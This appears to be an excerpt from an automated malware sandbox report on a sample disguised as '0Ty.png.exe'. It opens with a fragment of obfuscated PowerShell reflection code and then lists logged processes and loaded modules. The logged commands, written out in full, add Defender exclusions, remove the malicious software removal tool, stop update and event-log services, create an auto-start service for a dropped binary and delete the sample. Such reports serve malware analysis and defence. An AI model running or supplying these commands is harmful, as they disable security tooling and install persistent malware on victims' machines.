Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}
            Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HGLZSDMZ"Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HGLZSDMZ"Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
            Source: C:\Users\user\Desktop\0Ty.png.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
